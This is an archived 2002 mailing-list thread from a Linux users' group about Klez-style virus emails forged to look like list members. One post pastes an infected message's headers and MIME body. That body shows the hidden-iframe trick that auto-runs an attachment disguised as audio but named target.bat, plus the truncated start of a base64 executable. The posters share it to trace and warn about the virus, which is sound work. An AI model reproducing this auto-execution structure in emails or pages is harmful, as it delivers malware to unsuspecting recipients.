[lug] Someone on this list likely has a windows virus

Mon Apr 29 12:57:27 MDT 2002

> I am wondering how many people here have received messages

Hello Dan,

I remember seeing something like "Look,my beautiful girl friend"? recently.
I think it was on either this or one of the other mail lists I monitor
freeBSD.org or CLUE.  I deleted it without looking at it so I can't say much
about it.

There is a note on the FreeBSD list at the moment received 4/28/2002 9:09pm
my time from asayon Re:look, my beutiful girl friend
YOUR MAIL HAD THE VIRUS Exploit-MIME.gen AND COULD NOT BE CLEANED.
Return-Path: <owner-freebsd-questions at FreeBSD.ORG>
Received: from tg2.sharp.co.jp (tg2.sharp.co.jp [211.4.241.20])
	by hub.freebsd.org (Postfix) with ESMTP id 7109B37B405
	for <questions at FreeBSD.org>; Sun, 28 Apr 2002 20:10:57 -0700 (PDT)

Please keep us on the list posted with your findings.

Thanks,

Paul
http://bille.cudenver.edu/author

-----Original Message-----
From: lug-admin at lug.boulder.co.us [mailto:lug-admin at lug.boulder.co.us]On
Behalf Of D. Stimits
Sent: Monday, April 29, 2002 12:29 PM
To: BLUG
Subject: [lug] Someone on this list likely has a windows virus

Either someone on this list has a windows virus, or else this list is
being targeted. Tkil noticed someone sent one of the recent windows
virii with the header forged to look like me. I just got one forged to
look like Alan Robertson. I have also received several of what I think
are Klez virus from non-BLUG sources, the epidemic seems to be started
again. But since this virus goes after everyone in the address book, and
probably everyone new mail arrives from, and since my name was forged in
to Tkil's email, and Alan Robertson's was forged into one sent to me,
all within the last few days, it makes sense. One thing that is in
common to every one of these is verizon.net in the return path. Verizon
is the common theme in the ones reaching me, regardless of whether it is
forged to look like someone from BLUG or from someone I don't recognize.
In tracing the actual dotted decimal address from the header of email
forging Alan Robertson's name, I found the real source was owned by what
looks like a Brazil domain, though I'm not positive (and I have recently
sent spam reports to spamcop about Brazilian unsolicited spam, some Mac
advertisement I think, but I don't speak the language). Anyway, I am
wondering how many people here have received messages which use the name
of someone from the BLUG list, beside me and tkil? How many have
recently received email which has a stupid subject like the one from the
most recent for me, "Look,my beautiful girl friend"? Below I'm going to
mouse paste the header and the virus indicator part, maybe someone can
get an idea. I'd also like to figure out who to complain to at
150.162.47.13. I'll be sending an email to verizon as well, since they
seem to be targeted to take the blame. Anyway, info follows below. Hope
it doesn't false trigger someone's virus software (though I can't
imagine a lot of people here are using windows, and even if they are,
most will use antivirus with it).

D. Stimits, stimits at idcomm.com

Return-Path: <alanr at verizon.net>
Received: from brainstem.idcomm.com (brainstem.idcomm.com
[207.40.196.12])
        by mailhost.idcomm.com (8.10.2/8.10.0) with ESMTP id
g3TEEE932388
        for <stimits at idcomm.com>; Mon, 29 Apr 2002 08:14:14 -0600
Received: from out006.verizon.net (out006pub.verizon.net
[206.46.170.106])
        by brainstem.idcomm.com (8.11.6/8.11.6) with ESMTP id
g3TE71Q27056
        for <stimits at idcomm.com>; Mon, 29 Apr 2002 08:07:04 -0600
X-Spam-Filter: check_local at brainstem.idcomm.com by digitalanswers.org
Received: from Lfuoq ([150.162.47.13]) by out006.verizon.net
          (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with
SMTP
          id <20020429140914.CVEK2106.out006.verizon.net at Lfuoq>
          for <stimits at idcomm.com>; Mon, 29 Apr 2002 09:09:14 -0500
From: alanr <alanr at suse.com>
To: stimits at idcomm.com
Subject: Look,my beautiful girl friend
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary=Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Message-Id: <20020429140914.CVEK2106.out006.verizon.net at Lfuoq>
Date: Mon, 29 Apr 2002 09:09:19 -0500
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: _J6H.2UVz8.mailhost

--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Cq2e2IcsWGC2q height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Content-Type: audio/x-wav;
        name=target.bat
Content-Transfer-Encoding: base64
Content-ID: <Cq2e2IcsWGC2q>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g

...snip...this is the executable in base64 encoding...

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=9
--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp

Content-Type: application/octet-stream;
        name=site=uolbr&size=popup&page=0&stat=corposaude[1].htm
Content-Transfer-Encoding: base64
Content-ID: <Cq2e2IcsWGC2q>

PGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Ii9ldmVudC5uZy9UeXBlPWNsaWNrJlByb2ZpbGVJ
RD0xMjg3JlJ1bklEPTkwNDYmQWRJRD00MjQ4JlRhZ1ZhbHVlcz0yMDYuMjQzLjMyNi4xOTI3
JkZhbWlseUlEPTI3MSZHcm91cElEPTEmUmVkaXJlY3Q9aHR0cDolMkYlMkZ3d3cubWVyY2Fk
b2xpdnJlLmNvbS5iciUyRmJyYXNpbCUyRm1sJTJGcG1zJTNGc2l0ZSUzRDIxMTU1NyUyNmlk
JTNEMjAyMSUyNmFzX29wdCUzRGh0dHA6JTJGJTJGd3d3Lm1lcmNhZG9saXZyZS5jb20lMkZv
cmctaW1nJTJGaHRtbCUyRk1MQiUyRnNlbWFuYWxfZW5jaHVmYXRlLmh0bWwiPjxpbWcgc3Jj
PSJodHRwOi8vYmFubmVycy5pbWcudW9sLmNvbS5ici9tZXJjYWRvbGl2cmVfdW9sX3BvcF84
NS5naWYiIGJvcmRlcj0wIGhlaWdodD0yMTUgd2lkdGg9MjUwIGFsdD0iIj48L2E+
--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp--
_______________________________________________
Web Page:  http://lug.boulder.co.us
Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
Join us on IRC: lug.boulder.co.us port=6667 channel=#colug